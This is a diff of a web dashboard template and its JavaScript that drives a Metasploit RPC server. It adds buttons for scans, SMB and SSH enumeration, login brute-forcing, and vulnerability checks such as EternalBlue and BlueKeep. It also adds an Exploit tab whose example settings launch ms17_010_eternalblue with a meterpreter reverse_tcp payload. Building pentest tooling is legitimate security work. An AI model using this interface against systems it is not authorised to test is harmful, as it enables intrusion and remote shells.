|
||||
<div id="server-panel" style="display:none;margin-top:0.75rem;padding:0.75rem;background:var(--surface);border:1px solid var(--border);border-radius:6px">
|
||||
<div style="display:grid;grid-template-columns:1fr 80px 1fr 1fr;gap:0.5rem;align-items:end">
|
||||
<div class="form-group" style="margin-bottom:0">
|
||||
<label for="msf-host">Host</label>
|
||||
<input type="text" id="msf-host" value="127.0.0.1">
|
||||
</div>
|
||||
<div class="form-group" style="margin-bottom:0">
|
||||
<label for="msf-port">Port</label>
|
||||
<input type="text" id="msf-port" value="55553">
|
||||
</div>
|
||||
<div class="form-group" style="margin-bottom:0">
|
||||
<label for="msf-user">Username</label>
|
||||
<input type="text" id="msf-user" value="msf">
|
||||
</div>
|
||||
<div class="form-group" style="margin-bottom:0">
|
||||
<label for="msf-pass">Password</label>
|
||||
<input type="password" id="msf-pass" placeholder="required">
|
||||
</div>
|
||||
</div>
|
||||
<div style="display:flex;align-items:center;gap:0.75rem;margin-top:0.5rem">
|
||||
<label style="font-size:0.85rem;display:flex;align-items:center;gap:0.3rem;cursor:pointer">
|
||||
<input type="checkbox" id="msf-ssl" checked> SSL
|
||||
</label>
|
||||
<div style="flex:1"></div>
|
||||
<button class="btn btn-small" onclick="msfSaveSettings()">Save Settings</button>
|
||||
<button class="btn btn-primary btn-small" onclick="msfStartServer()">Start & Connect</button>
|
||||
<button class="btn btn-small" onclick="msfConnectOnly()">Connect Only</button>
|
||||
</div>
|
||||
<div id="server-msg" style="font-size:0.8rem;color:var(--text-muted);margin-top:0.5rem"></div>
|
||||
</div>
|
||||
<div id="msf-info" style="font-size:0.85rem;color:var(--text-secondary);margin-top:4px"></div>
|
||||
<p style="font-size:0.8rem;color:var(--text-muted);margin-top:8px">Module execution is CLI-only for safety. The web UI provides search, browsing, and status.</p>
|
||||
</div>
|
||||
|
||||
<!-- Module Search -->
|
||||
@ -28,55 +66,6 @@
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- Module Browser -->
|
||||
<div class="section">
|
||||
<h2>Module Browser</h2>
|
||||
<div class="tab-bar">
|
||||
<button class="tab active" data-tab-group="msf-browse" data-tab="auxiliary" onclick="showTab('msf-browse','auxiliary');browseMSFModules('auxiliary')">Scanners</button>
|
||||
<button class="tab" data-tab-group="msf-browse" data-tab="exploit" onclick="showTab('msf-browse','exploit');browseMSFModules('exploit')">Exploits</button>
|
||||
<button class="tab" data-tab-group="msf-browse" data-tab="post" onclick="showTab('msf-browse','post');browseMSFModules('post')">Post</button>
|
||||
<button class="tab" data-tab-group="msf-browse" data-tab="payload" onclick="showTab('msf-browse','payload');browseMSFModules('payload')">Payloads</button>
|
||||
</div>
|
||||
<input type="hidden" id="msf-page-auxiliary" value="1">
|
||||
<input type="hidden" id="msf-page-exploit" value="1">
|
||||
<input type="hidden" id="msf-page-post" value="1">
|
||||
<input type="hidden" id="msf-page-payload" value="1">
|
||||
<div class="tab-content active" data-tab-group="msf-browse" data-tab="auxiliary" id="msf-modules-auxiliary">
|
||||
<div class="empty-state">Click a tab to browse modules.</div>
|
||||
</div>
|
||||
<div class="tab-content" data-tab-group="msf-browse" data-tab="exploit" id="msf-modules-exploit"></div>
|
||||
<div class="tab-content" data-tab-group="msf-browse" data-tab="post" id="msf-modules-post"></div>
|
||||
<div class="tab-content" data-tab-group="msf-browse" data-tab="payload" id="msf-modules-payload"></div>
|
||||
</div>
|
||||
|
||||
<!-- Sessions -->
|
||||
<div class="section">
|
||||
<h2>Active Sessions</h2>
|
||||
<div class="tool-actions">
|
||||
<button class="btn btn-small" onclick="loadMSFSessions()">Refresh</button>
|
||||
</div>
|
||||
<div id="msf-sessions">
|
||||
<div class="empty-state">Click "Refresh" to check for active sessions.</div>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
{% if modules %}
|
||||
<div class="section">
|
||||
<h2>Offense Modules</h2>
|
||||
<ul class="module-list">
|
||||
{% for name, info in modules.items() %}
|
||||
<li class="module-item">
|
||||
<div>
|
||||
<div class="module-name">{{ name }}</div>
|
||||
<div class="module-desc">{{ info.description }}</div>
|
||||
</div>
|
||||
<div class="module-meta">v{{ info.version }}</div>
|
||||
</li>
|
||||
{% endfor %}
|
||||
</ul>
|
||||
</div>
|
||||
{% endif %}
|
||||
|
||||
<!-- Run Module -->
|
||||
<div class="section">
|
||||
<h2>Run Module</h2>
|
||||
@ -84,6 +73,10 @@
|
||||
<button class="tab active" data-tab-group="run-tabs" data-tab="ssh" onclick="showTab('run-tabs','ssh')">SSH</button>
|
||||
<button class="tab" data-tab-group="run-tabs" data-tab="portscan" onclick="showTab('run-tabs','portscan')">Port Scan</button>
|
||||
<button class="tab" data-tab-group="run-tabs" data-tab="osdetect" onclick="showTab('run-tabs','osdetect')">OS Detect</button>
|
||||
<button class="tab" data-tab-group="run-tabs" data-tab="vuln" onclick="showTab('run-tabs','vuln')">Vuln Scan</button>
|
||||
<button class="tab" data-tab-group="run-tabs" data-tab="smb" onclick="showTab('run-tabs','smb')">SMB</button>
|
||||
<button class="tab" data-tab-group="run-tabs" data-tab="http" onclick="showTab('run-tabs','http')">HTTP</button>
|
||||
<button class="tab" data-tab-group="run-tabs" data-tab="exploit" onclick="showTab('run-tabs','exploit')">Exploit</button>
|
||||
<button class="tab" data-tab-group="run-tabs" data-tab="custom" onclick="showTab('run-tabs','custom')">Custom</button>
|
||||
</div>
|
||||
|
||||
@ -105,6 +98,7 @@
|
||||
</div>
|
||||
<div class="tool-actions" style="margin-top:0.75rem">
|
||||
<button class="btn btn-primary" onclick="runFeaturedModule('ssh')">Run SSH Version Scan</button>
|
||||
<button class="btn btn-secondary" onclick="runFeaturedModule('ssh-enum')">SSH Enum Users</button>
|
||||
<button class="btn btn-secondary" onclick="toggleBruteRow()">SSH Brute-Force ↓</button>
|
||||
</div>
|
||||
<div id="ssh-brute-row" style="display:none;margin-top:0.5rem">
|
||||
@ -139,8 +133,10 @@
|
||||
</div>
|
||||
</div>
|
||||
<div class="tool-actions" style="margin-top:0.75rem">
|
||||
<button class="btn btn-primary" onclick="runFeaturedModule('tcp-scan')">Run TCP Scan</button>
|
||||
<button class="btn btn-secondary" onclick="runFeaturedModule('syn-scan')">Run SYN Scan</button>
|
||||
<button class="btn btn-primary" onclick="runFeaturedModule('tcp-scan')">TCP Scan</button>
|
||||
<button class="btn btn-secondary" onclick="runFeaturedModule('syn-scan')">SYN Scan</button>
|
||||
<button class="btn btn-secondary" onclick="runFeaturedModule('ack-scan')">ACK Scan</button>
|
||||
<button class="btn btn-secondary" onclick="runFeaturedModule('udp-scan')">UDP Sweep</button>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
@ -153,11 +149,119 @@
|
||||
</div>
|
||||
</div>
|
||||
<div class="tool-actions">
|
||||
<button class="btn btn-primary" onclick="runFeaturedModule('smb-version')">Run SMB Version</button>
|
||||
<button class="btn btn-secondary" onclick="runFeaturedModule('http-header')">Run HTTP Header</button>
|
||||
<button class="btn btn-primary" onclick="runFeaturedModule('smb-version')">SMB Version</button>
|
||||
<button class="btn btn-secondary" onclick="runFeaturedModule('http-header')">HTTP Header</button>
|
||||
<button class="btn btn-secondary" onclick="runFeaturedModule('ftp-version')">FTP Version</button>
|
||||
<button class="btn btn-secondary" onclick="runFeaturedModule('telnet-version')">Telnet Version</button>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- Vuln Scan tab -->
|
||||
<div class="tab-content" data-tab-group="run-tabs" data-tab="vuln">
|
||||
<div style="display:grid;grid-template-columns:1fr auto;gap:0.75rem;align-items:end;margin-top:0.75rem">
|
||||
<div class="form-group" style="margin-bottom:0">
|
||||
<label for="vuln-rhosts">Target(s)</label>
|
||||
<input type="text" id="vuln-rhosts" placeholder="192.168.1.0/24 or 10.0.0.5">
|
||||
</div>
|
||||
<div class="form-group" style="margin-bottom:0">
|
||||
<label for="vuln-threads">Threads</label>
|
||||
<input type="text" id="vuln-threads" value="5" style="width:60px">
|
||||
</div>
|
||||
</div>
|
||||
<div class="tool-actions" style="margin-top:0.75rem">
|
||||
<button class="btn btn-danger" onclick="runFeaturedModule('eternalblue-check')">EternalBlue Check</button>
|
||||
<button class="btn btn-danger" onclick="runFeaturedModule('bluekeep-check')">BlueKeep Check</button>
|
||||
<button class="btn btn-secondary" onclick="runFeaturedModule('ssl-heartbleed')">Heartbleed Check</button>
|
||||
<button class="btn btn-secondary" onclick="runFeaturedModule('shellshock-check')">Shellshock Check</button>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- SMB tab -->
|
||||
<div class="tab-content" data-tab-group="run-tabs" data-tab="smb">
|
||||
<div style="display:grid;grid-template-columns:1fr auto auto;gap:0.75rem;align-items:end;margin-top:0.75rem">
|
||||
<div class="form-group" style="margin-bottom:0">
|
||||
<label for="smb-rhosts">Target(s)</label>
|
||||
<input type="text" id="smb-rhosts" placeholder="192.168.1.0/24 or 10.0.0.5">
|
||||
</div>
|
||||
<div class="form-group" style="margin-bottom:0">
|
||||
<label for="smb-user">Username</label>
|
||||
<input type="text" id="smb-user" placeholder="admin" style="width:100px">
|
||||
</div>
|
||||
<div class="form-group" style="margin-bottom:0">
|
||||
<label for="smb-pass">Password</label>
|
||||
<input type="text" id="smb-pass" placeholder="" style="width:100px">
|
||||
</div>
|
||||
</div>
|
||||
<div class="tool-actions" style="margin-top:0.75rem">
|
||||
<button class="btn btn-primary" onclick="runFeaturedModule('smb-enum-shares')">Enum Shares</button>
|
||||
<button class="btn btn-secondary" onclick="runFeaturedModule('smb-enum-users')">Enum Users</button>
|
||||
<button class="btn btn-secondary" onclick="runFeaturedModule('smb-login')">SMB Login</button>
|
||||
<button class="btn btn-secondary" onclick="runFeaturedModule('smb-pipe-auditor')">Pipe Auditor</button>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- HTTP tab -->
|
||||
<div class="tab-content" data-tab-group="run-tabs" data-tab="http">
|
||||
<div style="display:grid;grid-template-columns:1fr auto auto;gap:0.75rem;align-items:end;margin-top:0.75rem">
|
||||
<div class="form-group" style="margin-bottom:0">
|
||||
<label for="http-rhosts">Target(s)</label>
|
||||
<input type="text" id="http-rhosts" placeholder="192.168.1.0/24 or example.com">
|
||||
</div>
|
||||
<div class="form-group" style="margin-bottom:0">
|
||||
<label for="http-rport">Port</label>
|
||||
<input type="text" id="http-rport" value="80" style="width:70px">
|
||||
</div>
|
||||
<div class="form-group" style="margin-bottom:0">
|
||||
<label for="http-threads">Threads</label>
|
||||
<input type="text" id="http-threads" value="5" style="width:60px">
|
||||
</div>
|
||||
</div>
|
||||
<div style="margin-top:0.5rem">
|
||||
<div class="form-group" style="margin-bottom:0">
|
||||
<label for="http-targeturi">Target URI</label>
|
||||
<input type="text" id="http-targeturi" value="/" placeholder="/">
|
||||
</div>
|
||||
</div>
|
||||
<div class="tool-actions" style="margin-top:0.75rem">
|
||||
<button class="btn btn-primary" onclick="runFeaturedModule('http-dir-scanner')">Dir Scanner</button>
|
||||
<button class="btn btn-secondary" onclick="runFeaturedModule('http-title')">HTTP Title</button>
|
||||
<button class="btn btn-secondary" onclick="runFeaturedModule('http-robots')">robots.txt</button>
|
||||
<button class="btn btn-secondary" onclick="runFeaturedModule('http-cert')">SSL Cert</button>
|
||||
</div>
|
||||
</div>
|
||||
|
||||
<!-- Exploit tab -->
|
||||
<div class="tab-content" data-tab-group="run-tabs" data-tab="exploit">
|
||||
<div style="display:grid;grid-template-columns:1fr 1fr;gap:0.75rem;align-items:end;margin-top:0.75rem">
|
||||
<div class="form-group" style="margin-bottom:0">
|
||||
<label for="exp-rhosts">Target (RHOSTS)</label>
|
||||
<input type="text" id="exp-rhosts" placeholder="192.168.1.5">
|
||||
</div>
|
||||
<div class="form-group" style="margin-bottom:0">
|
||||
<label for="exp-lhost">Your IP (LHOST)</label>
|
||||
<input type="text" id="exp-lhost" placeholder="192.168.1.100">
|
||||
</div>
|
||||
</div>
|
||||
<div style="display:grid;grid-template-columns:1fr auto auto;gap:0.75rem;align-items:end;margin-top:0.5rem">
|
||||
<div class="form-group" style="margin-bottom:0">
|
||||
<label for="exp-module">Exploit Module</label>
|
||||
<input type="text" id="exp-module" placeholder="exploit/windows/smb/ms17_010_eternalblue">
|
||||
</div>
|
||||
<div class="form-group" style="margin-bottom:0">
|
||||
<label for="exp-payload">Payload</label>
|
||||
<input type="text" id="exp-payload" placeholder="windows/x64/meterpreter/reverse_tcp" style="width:250px">
|
||||
</div>
|
||||
<div class="form-group" style="margin-bottom:0">
|
||||
<label for="exp-lport">LPORT</label>
|
||||
<input type="text" id="exp-lport" value="4444" style="width:70px">
|
||||
</div>
|
||||
</div>
|
||||
<div class="tool-actions" style="margin-top:0.75rem">
|
||||
<button class="btn btn-danger" onclick="runFeaturedModule('exploit-run')">Launch Exploit</button>
|
||||
</div>
|
||||
<p style="font-size:0.75rem;color:var(--text-muted);margin-top:0.5rem">Exploits run as background jobs. Check Active Sessions for shells.</p>
|
||||
</div>
|
||||
|
||||
<!-- Custom tab -->
|
||||
<div class="tab-content" data-tab-group="run-tabs" data-tab="custom">
|
||||
<div style="margin-top:0.75rem">
|
||||
@ -183,6 +287,57 @@
|
||||
<div id="module-output" class="results-stream" style="min-height:140px;margin-top:0.5rem"></div>
|
||||
</div>
|
||||
|
||||
<!-- Module Browser -->
|
||||
<div class="section">
|
||||
<h2>Module Browser</h2>
|
||||
<div class="tab-bar">
|
||||
<button class="tab active" data-tab-group="msf-browse" data-tab="auxiliary" onclick="showTab('msf-browse','auxiliary');browseMSFModules('auxiliary')">Scanners</button>
|
||||
<button class="tab" data-tab-group="msf-browse" data-tab="exploit" onclick="showTab('msf-browse','exploit');browseMSFModules('exploit')">Exploits</button>
|
||||
<button class="tab" data-tab-group="msf-browse" data-tab="post" onclick="showTab('msf-browse','post');browseMSFModules('post')">Post</button>
|
||||
<button class="tab" data-tab-group="msf-browse" data-tab="payload" onclick="showTab('msf-browse','payload');browseMSFModules('payload')">Payloads</button>
|
||||
</div>
|
||||
<input type="hidden" id="msf-page-auxiliary" value="1">
|
||||
<input type="hidden" id="msf-page-exploit" value="1">
|
||||
<input type="hidden" id="msf-page-post" value="1">
|
||||
<input type="hidden" id="msf-page-payload" value="1">
|
||||
<div class="tab-content active" data-tab-group="msf-browse" data-tab="auxiliary" id="msf-modules-auxiliary">
|
||||
<div class="empty-state">Click a tab to browse modules.</div>
|
||||
</div>
|
||||
<div class="tab-content" data-tab-group="msf-browse" data-tab="exploit" id="msf-modules-exploit"></div>
|
||||
<div class="tab-content" data-tab-group="msf-browse" data-tab="post" id="msf-modules-post"></div>
|
||||
<div class="tab-content" data-tab-group="msf-browse" data-tab="payload" id="msf-modules-payload"></div>
|
||||
</div>
|
||||
|
||||
<!-- Sessions & Jobs -->
|
||||
<div class="section">
|
||||
<h2>Active Sessions & Jobs</h2>
|
||||
<div class="tool-actions">
|
||||
<button class="btn btn-small" onclick="loadMSFSessions()">Refresh Sessions</button>
|
||||
<button class="btn btn-small" onclick="loadMSFJobs()">Refresh Jobs</button>
|
||||
</div>
|
||||
<div id="msf-sessions">
|
||||
<div class="empty-state">Click "Refresh" to check for active sessions and jobs.</div>
|
||||
</div>
|
||||
<div id="msf-jobs" style="margin-top:0.5rem"></div>
|
||||
</div>
|
||||
|
||||
{% if modules %}
|
||||
<div class="section">
|
||||
<h2>Offense Modules</h2>
|
||||
<ul class="module-list">
|
||||
{% for name, info in modules.items() %}
|
||||
<li class="module-item">
|
||||
<div>
|
||||
<div class="module-name">{{ name }}</div>
|
||||
<div class="module-desc">{{ info.description }}</div>
|
||||
</div>
|
||||
<div class="module-meta">v{{ info.version }}</div>
|
||||
</li>
|
||||
{% endfor %}
|
||||
</ul>
|
||||
</div>
|
||||
{% endif %}
|
||||
|
||||
<!-- Agent Hal -->
|
||||
<div class="section">
|
||||
<h2>Agent Hal — Autonomous Mode</h2>
|
||||
@ -202,18 +357,169 @@ let _currentRunId = null;
|
||||
// Check MSF status on page load
|
||||
document.addEventListener('DOMContentLoaded', function() { checkMSFStatus(); });
|
||||
|
||||
/* ── Featured Module Definitions ───────────────────────────────── */
|
||||
const _FEATURED = {
|
||||
'ssh': {path: 'auxiliary/scanner/ssh/ssh_version', opts: () => ({RHOSTS: v('ssh-rhosts'), RPORT: parseInt(v('ssh-rport')) || 22, THREADS: parseInt(v('ssh-threads')) || 10})},
|
||||
'ssh-brute': {path: 'auxiliary/scanner/ssh/ssh_login', opts: () => ({RHOSTS: v('ssh-rhosts'), RPORT: parseInt(v('ssh-rport')) || 22, USERNAME: v('ssh-username'), PASSWORD: v('ssh-password')})},
|
||||
'tcp-scan': {path: 'auxiliary/scanner/portscan/tcp', opts: () => ({RHOSTS: v('ps-rhosts'), PORTS: v('ps-ports') || '1-1024', THREADS: parseInt(v('ps-threads')) || 10})},
|
||||
'syn-scan': {path: 'auxiliary/scanner/portscan/syn', opts: () => ({RHOSTS: v('ps-rhosts'), PORTS: v('ps-ports') || '1-1024', THREADS: parseInt(v('ps-threads')) || 10})},
|
||||
'smb-version':{path: 'auxiliary/scanner/smb/smb_version', opts: () => ({RHOSTS: v('os-rhosts')})},
|
||||
'http-header':{path: 'auxiliary/scanner/http/http_header', opts: () => ({RHOSTS: v('os-rhosts')})},
|
||||
'custom': {path: null, opts: () => {try{return JSON.parse(v('custom-options') || '{}')}catch(e){return {}}}},
|
||||
// SSH
|
||||
'ssh': {path: 'auxiliary/scanner/ssh/ssh_version', opts: () => ({RHOSTS: v('ssh-rhosts'), RPORT: parseInt(v('ssh-rport')) || 22, THREADS: parseInt(v('ssh-threads')) || 10})},
|
||||
'ssh-enum': {path: 'auxiliary/scanner/ssh/ssh_enumusers', opts: () => ({RHOSTS: v('ssh-rhosts'), RPORT: parseInt(v('ssh-rport')) || 22, THREADS: parseInt(v('ssh-threads')) || 10})},
|
||||
'ssh-brute': {path: 'auxiliary/scanner/ssh/ssh_login', opts: () => ({RHOSTS: v('ssh-rhosts'), RPORT: parseInt(v('ssh-rport')) || 22, USERNAME: v('ssh-username'), PASSWORD: v('ssh-password')})},
|
||||
// Port Scan
|
||||
'tcp-scan': {path: 'auxiliary/scanner/portscan/tcp', opts: () => ({RHOSTS: v('ps-rhosts'), PORTS: v('ps-ports') || '1-1024', THREADS: parseInt(v('ps-threads')) || 10})},
|
||||
'syn-scan': {path: 'auxiliary/scanner/portscan/syn', opts: () => ({RHOSTS: v('ps-rhosts'), PORTS: v('ps-ports') || '1-1024', THREADS: parseInt(v('ps-threads')) || 10})},
|
||||
'ack-scan': {path: 'auxiliary/scanner/portscan/ack', opts: () => ({RHOSTS: v('ps-rhosts'), PORTS: v('ps-ports') || '1-1024', THREADS: parseInt(v('ps-threads')) || 10})},
|
||||
'udp-scan': {path: 'auxiliary/scanner/discovery/udp_sweep', opts: () => ({RHOSTS: v('ps-rhosts'), THREADS: parseInt(v('ps-threads')) || 10})},
|
||||
// OS Detect
|
||||
'smb-version': {path: 'auxiliary/scanner/smb/smb_version', opts: () => ({RHOSTS: v('os-rhosts')})},
|
||||
'http-header': {path: 'auxiliary/scanner/http/http_header', opts: () => ({RHOSTS: v('os-rhosts')})},
|
||||
'ftp-version': {path: 'auxiliary/scanner/ftp/ftp_version', opts: () => ({RHOSTS: v('os-rhosts')})},
|
||||
'telnet-version':{path: 'auxiliary/scanner/telnet/telnet_version', opts: () => ({RHOSTS: v('os-rhosts')})},
|
||||
// Vuln Scan
|
||||
'eternalblue-check': {path: 'auxiliary/scanner/smb/smb_ms17_010', opts: () => ({RHOSTS: v('vuln-rhosts'), THREADS: parseInt(v('vuln-threads')) || 5})},
|
||||
'bluekeep-check': {path: 'auxiliary/scanner/rdp/cve_2019_0708_bluekeep', opts: () => ({RHOSTS: v('vuln-rhosts'), THREADS: parseInt(v('vuln-threads')) || 5})},
|
||||
'ssl-heartbleed': {path: 'auxiliary/scanner/ssl/openssl_heartbleed', opts: () => ({RHOSTS: v('vuln-rhosts'), THREADS: parseInt(v('vuln-threads')) || 5})},
|
||||
'shellshock-check': {path: 'auxiliary/scanner/http/apache_mod_cgi_bash_env', opts: () => ({RHOSTS: v('vuln-rhosts'), THREADS: parseInt(v('vuln-threads')) || 5})},
|
||||
// SMB
|
||||
'smb-enum-shares': {path: 'auxiliary/scanner/smb/smb_enumshares', opts: () => ({RHOSTS: v('smb-rhosts'), SMBUser: v('smb-user'), SMBPass: v('smb-pass')})},
|
||||
'smb-enum-users': {path: 'auxiliary/scanner/smb/smb_enumusers', opts: () => ({RHOSTS: v('smb-rhosts'), SMBUser: v('smb-user'), SMBPass: v('smb-pass')})},
|
||||
'smb-login': {path: 'auxiliary/scanner/smb/smb_login', opts: () => ({RHOSTS: v('smb-rhosts'), SMBUser: v('smb-user'), SMBPass: v('smb-pass')})},
|
||||
'smb-pipe-auditor':{path: 'auxiliary/scanner/smb/pipe_auditor', opts: () => ({RHOSTS: v('smb-rhosts'), SMBUser: v('smb-user'), SMBPass: v('smb-pass')})},
|
||||
// HTTP
|
||||
'http-dir-scanner': {path: 'auxiliary/scanner/http/dir_scanner', opts: () => ({RHOSTS: v('http-rhosts'), RPORT: parseInt(v('http-rport')) || 80, THREADS: parseInt(v('http-threads')) || 5, PATH: v('http-targeturi') || '/'})},
|
||||
'http-title': {path: 'auxiliary/scanner/http/title', opts: () => ({RHOSTS: v('http-rhosts'), RPORT: parseInt(v('http-rport')) || 80})},
|
||||
'http-robots': {path: 'auxiliary/scanner/http/robots_txt', opts: () => ({RHOSTS: v('http-rhosts'), RPORT: parseInt(v('http-rport')) || 80})},
|
||||
'http-cert': {path: 'auxiliary/scanner/http/cert', opts: () => ({RHOSTS: v('http-rhosts'), RPORT: parseInt(v('http-rport')) || 443})},
|
||||
// Exploit
|
||||
'exploit-run': {path: null, opts: () => {
|
||||
const o = {RHOSTS: v('exp-rhosts'), LHOST: v('exp-lhost'), LPORT: parseInt(v('exp-lport')) || 4444};
|
||||
const payload = v('exp-payload');
|
||||
if (payload) o.PAYLOAD = payload;
|
||||
return o;
|
||||
}},
|
||||
// Custom
|
||||
'custom': {path: null, opts: () => {try{return JSON.parse(v('custom-options') || '{}')}catch(e){return {}}}},
|
||||
};
|
||||
|
||||
function v(id) { const el = document.getElementById(id); return el ? el.value.trim() : ''; }
|
||||
|
||||
/* ── Server Control ─────────────────────────────────────────────── */
|
||||
function checkMSFStatus() {
|
||||
fetch('/offense/status').then(r => r.json()).then(d => {
|
||||
const el = document.getElementById('msf-status');
|
||||
const ver = document.getElementById('msf-version');
|
||||
const btnConnect = document.getElementById('btn-connect');
|
||||
const btnDisconnect = document.getElementById('btn-disconnect');
|
||||
const btnStart = document.getElementById('btn-start-server');
|
||||
const btnStop = document.getElementById('btn-stop-server');
|
||||
|
||||
if (d.connected) {
|
||||
el.innerHTML = '<span class="status-dot active"></span>Connected';
|
||||
ver.textContent = d.version ? 'Metasploit ' + d.version : '';
|
||||
btnConnect.style.display = 'none';
|
||||
btnDisconnect.style.display = '';
|
||||
btnStop.style.display = d.server_running ? '' : 'none';
|
||||
btnStart.style.display = 'none';
|
||||
} else if (d.server_running) {
|
||||
el.innerHTML = '<span class="status-dot" style="background:var(--warning)"></span>Server running (not connected)';
|
||||
ver.textContent = '';
|
||||
btnConnect.style.display = '';
|
||||
btnDisconnect.style.display = 'none';
|
||||
btnStop.style.display = '';
|
||||
btnStart.style.display = 'none';
|
||||
} else {
|
||||
el.innerHTML = '<span class="status-dot inactive"></span>Not running';
|
||||
ver.textContent = '';
|
||||
btnConnect.style.display = 'none';
|
||||
btnDisconnect.style.display = 'none';
|
||||
btnStop.style.display = 'none';
|
||||
btnStart.style.display = '';
|
||||
}
|
||||
|
||||
// Populate settings panel
|
||||
if (d.host) document.getElementById('msf-host').value = d.host;
|
||||
if (d.port) document.getElementById('msf-port').value = d.port;
|
||||
if (d.username) document.getElementById('msf-user').value = d.username;
|
||||
document.getElementById('msf-ssl').checked = d.ssl !== false;
|
||||
}).catch(() => {
|
||||
document.getElementById('msf-status').innerHTML = '<span class="status-dot inactive"></span>Error checking status';
|
||||
});
|
||||
}
|
||||
|
||||
function toggleServerPanel() {
|
||||
const panel = document.getElementById('server-panel');
|
||||
panel.style.display = panel.style.display === 'none' ? '' : 'none';
|
||||
}
|
||||
|
||||
function _getServerSettings() {
|
||||
return {
|
||||
host: v('msf-host') || '127.0.0.1',
|
||||
port: parseInt(v('msf-port')) || 55553,
|
||||
username: v('msf-user') || 'msf',
|
||||
password: v('msf-pass'),
|
||||
ssl: document.getElementById('msf-ssl').checked,
|
||||
};
|
||||
}
|
||||
|
||||
function msfStartServer() {
|
||||
const settings = _getServerSettings();
|
||||
if (!settings.password) { alert('Password is required'); return; }
|
||||
const msg = document.getElementById('server-msg');
|
||||
msg.textContent = 'Starting server...';
|
||||
|
||||
fetch('/offense/server/start', {
|
||||
method: 'POST', headers: {'Content-Type': 'application/json'},
|
||||
body: JSON.stringify(settings)
|
||||
}).then(r => r.json()).then(d => {
|
||||
msg.textContent = d.ok ? (d.message || 'Started') : ('Error: ' + (d.error || 'unknown'));
|
||||
if (d.ok) { document.getElementById('server-panel').style.display = 'none'; checkMSFStatus(); }
|
||||
}).catch(e => { msg.textContent = 'Error: ' + e.message; });
|
||||
}
|
||||
|
||||
function msfConnectOnly() {
|
||||
const settings = _getServerSettings();
|
||||
if (!settings.password) { alert('Password is required'); return; }
|
||||
const msg = document.getElementById('server-msg');
|
||||
msg.textContent = 'Connecting...';
|
||||
|
||||
fetch('/offense/connect', {
|
||||
method: 'POST', headers: {'Content-Type': 'application/json'},
|
||||
body: JSON.stringify({password: settings.password})
|
||||
}).then(r => r.json()).then(d => {
|
||||
msg.textContent = d.ok ? 'Connected' : ('Error: ' + (d.error || 'unknown'));
|
||||
if (d.ok) { document.getElementById('server-panel').style.display = 'none'; checkMSFStatus(); }
|
||||
}).catch(e => { msg.textContent = 'Error: ' + e.message; });
|
||||
}
|
||||
|
||||
function msfConnect() {
|
||||
// Quick connect using saved password
|
||||
fetch('/offense/connect', {
|
||||
method: 'POST', headers: {'Content-Type': 'application/json'},
|
||||
body: JSON.stringify({})
|
||||
}).then(r => r.json()).then(d => {
|
||||
if (d.ok) { checkMSFStatus(); }
|
||||
else { toggleServerPanel(); document.getElementById('server-msg').textContent = d.error || 'Connection failed — enter password'; }
|
||||
});
|
||||
}
|
||||
|
||||
function msfDisconnect() {
|
||||
fetch('/offense/disconnect', {method: 'POST'}).then(() => checkMSFStatus());
|
||||
}
|
||||
|
||||
function msfStopServer() {
|
||||
if (!confirm('Stop the MSF RPC server?')) return;
|
||||
fetch('/offense/server/stop', {method: 'POST'}).then(() => checkMSFStatus());
|
||||
}
|
||||
|
||||
function msfSaveSettings() {
|
||||
const settings = _getServerSettings();
|
||||
fetch('/offense/settings', {
|
||||
method: 'POST', headers: {'Content-Type': 'application/json'},
|
||||
body: JSON.stringify(settings)
|
||||
}).then(r => r.json()).then(d => {
|
||||
document.getElementById('server-msg').textContent = d.ok ? 'Settings saved' : ('Error: ' + d.error);
|
||||
});
|
||||
}
|
||||
|
||||
/* ── Module Execution ───────────────────────────────────────────── */
|
||||
function toggleBruteRow() {
|
||||
var row = document.getElementById('ssh-brute-row');
|
||||
row.style.display = row.style.display === 'none' ? '' : 'none';
|
||||
@ -222,10 +528,19 @@ function toggleBruteRow() {
|
||||
function runFeaturedModule(key) {
|
||||
const cfg = _FEATURED[key];
|
||||
if (!cfg) return;
|
||||
const path = key === 'custom' ? v('custom-module') : cfg.path;
|
||||
let path;
|
||||
if (key === 'custom') {
|
||||
path = v('custom-module');
|
||||
} else if (key === 'exploit-run') {
|
||||
path = v('exp-module');
|
||||
} else {
|
||||
path = cfg.path;
|
||||
}
|
||||
if (!path) { alert('Enter a module path'); return; }
|
||||
const opts = cfg.opts();
|
||||
if (!opts.RHOSTS && key !== 'custom') { alert('Enter a target in RHOSTS'); return; }
|
||||
// Remove empty string values
|
||||
Object.keys(opts).forEach(k => { if (opts[k] === '' || opts[k] === undefined) delete opts[k]; });
|
||||
if (!opts.RHOSTS && !['custom'].includes(key)) { alert('Enter a target'); return; }
|
||||
runModule(path, opts);
|
||||
}
|
||||
|
||||
@ -234,14 +549,10 @@ function runModule(module_path, options) {
|
||||
const status = document.getElementById('run-status');
|
||||
const stopBtn = document.getElementById('run-stop-btn');
|
||||
out.innerHTML = '';
|
||||
status.textContent = 'Starting...';
|
||||
status.textContent = 'Starting ' + module_path + '...';
|
||||
stopBtn.style.display = '';
|
||||
_currentJobId = null;
|
||||
|
||||
const es = new EventSource('/offense/module/run?' + new URLSearchParams({_body: JSON.stringify({module_path, options})}));
|
||||
|
||||
// Use fetch + ReadableStream (EventSource doesn't support POST)
|
||||
es.close();
|
||||
fetch('/offense/module/run', {
|
||||
method: 'POST',
|
||||
headers: {'Content-Type': 'application/json'},
|
||||
@ -261,14 +572,27 @@ function runModule(module_path, options) {
|
||||
if (!line) return;
|
||||
try {
|
||||
const d = JSON.parse(line);
|
||||
if (d.job_id) { _currentJobId = d.job_id; status.textContent = 'Running…'; }
|
||||
if (d.job_id) { _currentJobId = d.job_id; status.textContent = 'Running ' + module_path + '…'; }
|
||||
if (d.error) { out.innerHTML += '<div class="err">Error: ' + escapeHtml(d.error) + '</div>'; stopBtn.style.display = 'none'; }
|
||||
if (d.line) { out.innerHTML += '<div>' + escapeHtml(d.line) + '</div>'; out.scrollTop = out.scrollHeight; }
|
||||
if (d.done) {
|
||||
if (d.line) {
|
||||
let cls = '';
|
||||
if (d.line.includes('[+]')) cls = 'success';
|
||||
else if (d.line.includes('[-]') || d.line.includes('Error')) cls = 'err';
|
||||
else if (d.line.includes('[!]')) cls = 'warn';
|
||||
